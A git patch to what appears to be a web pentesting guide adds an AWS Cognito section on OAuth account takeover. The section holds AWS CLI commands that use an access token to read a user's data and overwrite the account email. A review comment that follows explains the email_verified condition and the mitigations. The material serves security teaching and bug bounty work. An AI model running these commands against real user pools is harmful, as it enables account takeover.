From e10010e9f4f2694340e49a63bad430e7c44da2ff Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 30 Dec 2021 09:58:38 +0000 Subject: [PATCH] GitBook: [#2927] No subject --- pentesting-web/oauth-to-account-takeover.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md index 97c65f02f..41d0e9be6 100644 --- a/pentesting-web/oauth-to-account-takeover.md +++ b/pentesting-web/oauth-to-account-takeover.md 
@@ -155,6 +155,27 @@ The **authorization code should live just for some time to limit the time window If you can get the **authorization code and use it with a different client then you can takeover other accounts**. +### AWS Cognito + +In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **** you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts. + +``` +# Read info of the user +aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...] + +# Change email address +aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com +{ + "CodeDeliveryDetailsList": [ + { + "Destination": "i***@f***.com", + "DeliveryMedium": "EMAIL", + "AttributeName": "email" + } + ] +} +``` + ### SSRFs parameters One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client\_name", "client\_secret", "redirect\_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a **special registration endpoint**. This endpoint is normally mapped to "/register" and accepts POST requests with the following format:
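Review bot: the new "AWS Cognito" section asserts the token "might have enough permissions to overwrite the user data" but never states the condition that turns an attribute update into an account takeover, nor the fix, so a reader cannot tell when the finding applies. The `CodeDeliveryDetailsList` output in the hunk shows Cognito sending a verification code to the new address after `update-user-attributes`, which means the takeover depends on the relying application keying accounts on the `email` attribute without checking `email_verified`; add a sentence saying so, and that the mitigation is for the application to honour `email_verified` (or to identify users by the immutable `sub` claim) and to remove write permission on `email` in the app client's attribute read/write settings so the access token cannot change it at all. Two smaller points in the same hunk: the stray `****` after the advisory link is an empty-bold GitBook artifact and should be dropped, the untagged fence should be ```bash so the mixed command and JSON output block renders consistently with the rest of the file, and "take over others accounts" should read "take over others' accounts".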